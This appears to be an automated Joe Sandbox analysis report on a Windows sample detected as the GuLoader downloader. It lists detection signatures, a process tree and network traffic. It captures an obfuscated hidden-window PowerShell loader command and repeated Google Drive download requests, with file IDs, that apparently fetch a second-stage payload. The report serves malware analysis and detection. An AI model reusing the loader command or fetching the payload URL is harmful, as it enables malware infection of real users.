Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Xjz8dblHDe.exe

Overview

General Information

Sample name:Xjz8dblHDe.exe
renamed because original name is a hash value
Original sample name:be0fbc1afbc35ae095067c50dbd7cbc61451663c3d9821377bb15febcdfbcf50.exe
Analysis ID:1587589
MD5:cdde73a8f16b1279010f660e5ab67903
SHA1:9257099b42e772eed82b5e488d44fe7422a8c43d
SHA256:be0fbc1afbc35ae095067c50dbd7cbc61451663c3d9821377bb15febcdfbcf50
Tags:exeuser-adrian__luca
Infos:

Detection

GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Early bird code injection technique detected
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected GuLoader
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Loading BitLocker PowerShell Module
Powershell drops PE file
Queues an APC in another process (thread injection)
Suspicious powershell command line found
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Msiexec Initiated Connection
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

  • System is w10x64
  • Xjz8dblHDe.exe (PID: 3868 cmdline: "C:\Users\user\Desktop\Xjz8dblHDe.exe" MD5: CDDE73A8F16B1279010F660E5AB67903)
    • powershell.exe (PID: 5896 cmdline: "powershell.exe" -windowstyle hidden "$Rapportudskrifter=Get-Content -raw 'C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen\Resultatopgrelses186\Sidelbende.Kar';$Stormogulernes=$Rapportudskrifter.SubString(56424,3);.$Stormogulernes($Rapportudskrifter)" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 4796 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • msiexec.exe (PID: 7064 cmdline: "C:\Windows\syswow64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.2319447500.0000000009764000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
    00000005.00000002.3316134163.00000000037E4000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security

      Sigma Signatures

      System Summary

      barindex
      Sigma detected: Msiexec Initiated Connection
      Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 142.250.184.206, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 7064, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49787
      Sigma detected: Potential Binary Or Script Dropper Via PowerShell
      Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 5896, TargetFilename: C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen\Resultatopgrelses186\Xjz8dblHDe.exe
      Sigma detected: Non Interactive PowerShell Process Spawned
      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -windowstyle hidden "$Rapportudskrifter=Get-Content -raw 'C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen\Resultatopgrelses186\Sidelbende.Kar';$Stormogulernes=$Rapportudskrifter.SubString(56424,3);.$Stormogulernes($Rapportudskrifter)", CommandLine: "powershell.exe" -windowstyle hidden "$Rapportudskrifter=Get-Content -raw 'C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen\Resultatopgrelses186\Sidelbende.Kar';$Stormogulernes=$Rapportudskrifter.SubString(56424,3);.$Stormogulernes($Rapportudskrifter)", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Xjz8dblHDe.exe", ParentImage: C:\Users\user\Desktop\Xjz8dblHDe.exe, ParentProcessId: 3868, ParentProcessName: Xjz8dblHDe.exe, ProcessCommandLine: "powershell.exe" -windowstyle hidden "$Rapportudskrifter=Get-Content -raw 'C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen\Resultatopgrelses186\Sidelbende.Kar';$Stormogulernes=$Rapportudskrifter.SubString(56424,3);.$Stormogulernes($Rapportudskrifter)", ProcessId: 5896, ProcessName: powershell.exe

      Suricata Signatures

      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2025-01-10T15:16:19.416438+010028032702Potentially Bad Traffic192.168.2.549787142.250.184.206443TCP

      Joe Sandbox Signatures

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Antivirus / Scanner detection for submitted sample
      Source: Xjz8dblHDe.exeAvira: detected
      Antivirus detection for dropped file
      Source: C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen\Resultatopgrelses186\Xjz8dblHDe.exeAvira: detection malicious, Label: TR/Redcap.ybyjk
      Multi AV Scanner detection for dropped file
      Source: C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen\Resultatopgrelses186\Xjz8dblHDe.exeReversingLabs: Detection: 70%
      Source: C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen\Resultatopgrelses186\Xjz8dblHDe.exeVirustotal: Detection: 61%Perma Link
      Multi AV Scanner detection for submitted file
      Source: Xjz8dblHDe.exeVirustotal: Detection: 61%Perma Link
      Source: Xjz8dblHDe.exeReversingLabs: Detection: 70%
      AI detected suspicious sample
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.7% probability
      Source: Xjz8dblHDe.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.5:49787 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.193:443 -> 192.168.2.5:49798 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.5:49885 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.5:49900 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.5:49917 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.5:49934 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.5:49950 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.5:49968 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.5:49985 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.5:50002 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.5:50004 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.5:50006 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.5:50008 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.5:50010 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.5:50012 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.5:50014 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.5:50018 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.5:50020 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.5:50022 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.5:50024 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.5:50030 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.5:50034 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.5:50038 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.5:50040 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.5:50042 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.5:50044 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.5:50046 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.5:50050 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.5:50052 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.5:50054 version: TLS 1.2
      Source: Xjz8dblHDe.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: tem.Core.pdb source: powershell.exe, 00000001.00000002.2317799435.0000000008CD8000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.Core.pdbz source: powershell.exe, 00000001.00000002.2317799435.0000000008CD8000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: em.Core.pdb) source: powershell.exe, 00000001.00000002.2317799435.0000000008CD8000.00000004.00000020.00020000.00000000.sdmp
      Source: C:\Users\user\Desktop\Xjz8dblHDe.exeCode function: 0_2_00402868 FindFirstFileW,0_2_00402868
      Source: C:\Users\user\Desktop\Xjz8dblHDe.exeCode function: 0_2_004065DA FindFirstFileW,FindClose,0_2_004065DA
      Source: C:\Users\user\Desktop\Xjz8dblHDe.exeCode function: 0_2_004059A9 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_004059A9
      Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.5:49787 -> 142.250.184.206:443
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tls HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /download?id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tls&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tls HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=ZBKOThf7eXXxWdI9b4HtbzU0JOQOdL5bKciLrai1DINgY7c_dKQn0dyqO0QMrWMXFFQYOSomsrjgT2gPdglJ4nWB-USB7wa5u_po_GZ9uOMSm1qLvOF56CsDYTiLnZVnPyTNB16scpuM2b_5eRdeSY6Yn7cgU14mb-NtGzR1huuPScjTWqXKJUHpZ0c_S1m9ZQ
      Source: global trafficHTTP traffic detected: GET /download?id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tls&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=ZBKOThf7eXXxWdI9b4HtbzU0JOQOdL5bKciLrai1DINgY7c_dKQn0dyqO0QMrWMXFFQYOSomsrjgT2gPdglJ4nWB-USB7wa5u_po_GZ9uOMSm1qLvOF56CsDYTiLnZVnPyTNB16scpuM2b_5eRdeSY6Yn7cgU14mb-NtGzR1huuPScjTWqXKJUHpZ0c_S1m9ZQ
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tls HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=ZBKOThf7eXXxWdI9b4HtbzU0JOQOdL5bKciLrai1DINgY7c_dKQn0dyqO0QMrWMXFFQYOSomsrjgT2gPdglJ4nWB-USB7wa5u_po_GZ9uOMSm1qLvOF56CsDYTiLnZVnPyTNB16scpuM2b_5eRdeSY6Yn7cgU14mb-NtGzR1huuPScjTWqXKJUHpZ0c_S1m9ZQ
      Source: global trafficHTTP traffic detected: GET /download?id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tls&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=ZBKOThf7eXXxWdI9b4HtbzU0JOQOdL5bKciLrai1DINgY7c_dKQn0dyqO0QMrWMXFFQYOSomsrjgT2gPdglJ4nWB-USB7wa5u_po_GZ9uOMSm1qLvOF56CsDYTiLnZVnPyTNB16scpuM2b_5eRdeSY6Yn7cgU14mb-NtGzR1huuPScjTWqXKJUHpZ0c_S1m9ZQ
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tls HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=ZBKOThf7eXXxWdI9b4HtbzU0JOQOdL5bKciLrai1DINgY7c_dKQn0dyqO0QMrWMXFFQYOSomsrjgT2gPdglJ4nWB-USB7wa5u_po_GZ9uOMSm1qLvOF56CsDYTiLnZVnPyTNB16scpuM2b_5eRdeSY6Yn7cgU14mb-NtGzR1huuPScjTWqXKJUHpZ0c_S1m9ZQ
      Source: global trafficHTTP traffic detected: GET /download?id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tls&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=ZBKOThf7eXXxWdI9b4HtbzU0JOQOdL5bKciLrai1DINgY7c_dKQn0dyqO0QMrWMXFFQYOSomsrjgT2gPdglJ4nWB-USB7wa5u_po_GZ9uOMSm1qLvOF56CsDYTiLnZVnPyTNB16scpuM2b_5eRdeSY6Yn7cgU14mb-NtGzR1huuPScjTWqXKJUHpZ0c_S1m9ZQ
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tls HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=ZBKOThf7eXXxWdI9b4HtbzU0JOQOdL5bKciLrai1DINgY7c_dKQn0dyqO0QMrWMXFFQYOSomsrjgT2gPdglJ4nWB-USB7wa5u_po_GZ9uOMSm1qLvOF56CsDYTiLnZVnPyTNB16scpuM2b_5eRdeSY6Yn7cgU14mb-NtGzR1huuPScjTWqXKJUHpZ0c_S1m9ZQ
      Source: global trafficHTTP traffic detected: GET /download?id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tls&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=ZBKOThf7eXXxWdI9b4HtbzU0JOQOdL5bKciLrai1DINgY7c_dKQn0dyqO0QMrWMXFFQYOSomsrjgT2gPdglJ4nWB-USB7wa5u_po_GZ9uOMSm1qLvOF56CsDYTiLnZVnPyTNB16scpuM2b_5eRdeSY6Yn7cgU14mb-NtGzR1huuPScjTWqXKJUHpZ0c_S1m9ZQ
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tls HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=ZBKOThf7eXXxWdI9b4HtbzU0JOQOdL5bKciLrai1DINgY7c_dKQn0dyqO0QMrWMXFFQYOSomsrjgT2gPdglJ4nWB-USB7wa5u_po_GZ9uOMSm1qLvOF56CsDYTiLnZVnPyTNB16scpuM2b_5eRdeSY6Yn7cgU14mb-NtGzR1huuPScjTWqXKJUHpZ0c_S1m9ZQ
      Source: global trafficHTTP traffic detected: GET /download?id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tls&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=ZBKOThf7eXXxWdI9b4HtbzU0JOQOdL5bKciLrai1DINgY7c_dKQn0dyqO0QMrWMXFFQYOSomsrjgT2gPdglJ4nWB-USB7wa5u_po_GZ9uOMSm1qLvOF56CsDYTiLnZVnPyTNB16scpuM2b_5eRdeSY6Yn7cgU14mb-NtGzR1huuPScjTWqXKJUHpZ0c_S1m9ZQ
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tls HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=ZBKOThf7eXXxWdI9b4HtbzU0JOQOdL5bKciLrai1DINgY7c_dKQn0dyqO0QMrWMXFFQYOSomsrjgT2gPdglJ4nWB-USB7wa5u_po_GZ9uOMSm1qLvOF56CsDYTiLnZVnPyTNB16scpuM2b_5eRdeSY6Yn7cgU14mb-NtGzR1huuPScjTWqXKJUHpZ0c_S1m9ZQ
      Source: global trafficHTTP traffic detected: GET /download?id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tls&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=ZBKOThf7eXXxWdI9b4HtbzU0JOQOdL5bKciLrai1DINgY7c_dKQn0dyqO0QMrWMXFFQYOSomsrjgT2gPdglJ4nWB-USB7wa5u_po_GZ9uOMSm1qLvOF56CsDYTiLnZVnPyTNB16scpuM2b_5eRdeSY6Yn7cgU14mb-NtGzR1huuPScjTWqXKJUHpZ0c_S1m9ZQ
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tls HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=ZBKOThf7eXXxWdI9b4HtbzU0JOQOdL5bKciLrai1DINgY7c_dKQn0dyqO0QMrWMXFFQYOSomsrjgT2gPdglJ4nWB-USB7wa5u_po_GZ9uOMSm1qLvOF56CsDYTiLnZVnPyTNB16scpuM2b_5eRdeSY6Yn7cgU14mb-NtGzR1huuPScjTWqXKJUHpZ0c_S1m9ZQ
      Source: global trafficHTTP traffic detected: GET /download?id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tls&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=ZBKOThf7eXXxWdI9b4HtbzU0JOQOdL5bKciLrai1DINgY7c_dKQn0dyqO0QMrWMXFFQYOSomsrjgT2gPdglJ4nWB-USB7wa5u_po_GZ9uOMSm1qLvOF56CsDYTiLnZVnPyTNB16scpuM2b_5eRdeSY6Yn7cgU14mb-NtGzR1huuPScjTWqXKJUHpZ0c_S1m9ZQ
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tls HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=ZBKOThf7eXXxWdI9b4HtbzU0JOQOdL5bKciLrai1DINgY7c_dKQn0dyqO0QMrWMXFFQYOSomsrjgT2gPdglJ4nWB-USB7wa5u_po_GZ9uOMSm1qLvOF56CsDYTiLnZVnPyTNB16scpuM2b_5eRdeSY6Yn7cgU14mb-NtGzR1huuPScjTWqXKJUHpZ0c_S1m9ZQ
      Source: global trafficHTTP traffic detected: GET /download?id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tls&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=ZBKOThf7eXXxWdI9b4HtbzU0JOQOdL5bKciLrai1DINgY7c_dKQn0dyqO0QMrWMXFFQYOSomsrjgT2gPdglJ4nWB-USB7wa5u_po_GZ9uOMSm1qLvOF56CsDYTiLnZVnPyTNB16scpuM2b_5eRdeSY6Yn7cgU14mb-NtGzR1huuPScjTWqXKJUHpZ0c_S1m9ZQ
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tls HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=ZBKOThf7eXXxWdI9b4HtbzU0JOQOdL5bKciLrai1DINgY7c_dKQn0dyqO0QMrWMXFFQYOSomsrjgT2gPdglJ4nWB-USB7wa5u_po_GZ9uOMSm1qLvOF56CsDYTiLnZVnPyTNB16scpuM2b_5eRdeSY6Yn7cgU14mb-NtGzR1huuPScjTWqXKJUHpZ0c_S1m9ZQ
      Source: global trafficHTTP traffic detected: GET /download?id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tls&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=ZBKOThf7eXXxWdI9b4HtbzU0JOQOdL5bKciLrai1DINgY7c_dKQn0dyqO0QMrWMXFFQYOSomsrjgT2gPdglJ4nWB-USB7wa5u_po_GZ9uOMSm1qLvOF56CsDYTiLnZVnPyTNB16scpuM2b_5eRdeSY6Yn7cgU14mb-NtGzR1huuPScjTWqXKJUHpZ0c_S1m9ZQ
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tls HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=ZBKOThf7eXXxWdI9b4HtbzU0JOQOdL5bKciLrai1DINgY7c_dKQn0dyqO0QMrWMXFFQYOSomsrjgT2gPdglJ4nWB-USB7wa5u_po_GZ9uOMSm1qLvOF56CsDYTiLnZVnPyTNB16scpuM2b_5eRdeSY6Yn7cgU14mb-NtGzR1huuPScjTWqXKJUHpZ0c_S1m9ZQ
      Source: global trafficHTTP traffic detected: GET /download?id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tls&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=ZBKOThf7eXXxWdI9b4HtbzU0JOQOdL5bKciLrai1DINgY7c_dKQn0dyqO0QMrWMXFFQYOSomsrjgT2gPdglJ4nWB-USB7wa5u_po_GZ9uOMSm1qLvOF56CsDYTiLnZVnPyTNB16scpuM2b_5eRdeSY6Yn7cgU14mb-NtGzR1huuPScjTWqXKJUHpZ0c_S1m9ZQ
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tls HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=ZBKOThf7eXXxWdI9b4HtbzU0JOQOdL5bKciLrai1DINgY7c_dKQn0dyqO0QMrWMXFFQYOSomsrjgT2gPdglJ4nWB-USB7wa5u_po_GZ9uOMSm1qLvOF56CsDYTiLnZVnPyTNB16scpuM2b_5eRdeSY6Yn7cgU14mb-NtGzR1huuPScjTWqXKJUHpZ0c_S1m9ZQ
      Source: global trafficHTTP traffic detected: GET /download?id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tls&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=ZBKOThf7eXXxWdI9b4HtbzU0JOQOdL5bKciLrai1DINgY7c_dKQn0dyqO0QMrWMXFFQYOSomsrjgT2gPdglJ4nWB-USB7wa5u_po_GZ9uOMSm1qLvOF56CsDYTiLnZVnPyTNB16scpuM2b_5eRdeSY6Yn7cgU14mb-NtGzR1huuPScjTWqXKJUHpZ0c_S1m9ZQ
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tls HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=ZBKOThf7eXXxWdI9b4HtbzU0JOQOdL5bKciLrai1DINgY7c_dKQn0dyqO0QMrWMXFFQYOSomsrjgT2gPdglJ4nWB-USB7wa5u_po_GZ9uOMSm1qLvOF56CsDYTiLnZVnPyTNB16scpuM2b_5eRdeSY6Yn7cgU14mb-NtGzR1huuPScjTWqXKJUHpZ0c_S1m9ZQ
      Source: global trafficHTTP traffic detected: GET /download?id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tls&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=ZBKOThf7eXXxWdI9b4HtbzU0JOQOdL5bKciLrai1DINgY7c_dKQn0dyqO0QMrWMXFFQYOSomsrjgT2gPdglJ4nWB-USB7wa5u_po_GZ9uOMSm1qLvOF56CsDYTiLnZVnPyTNB16scpuM2b_5eRdeSY6Yn7cgU14mb-NtGzR1huuPScjTWqXKJUHpZ0c_S1m9ZQ
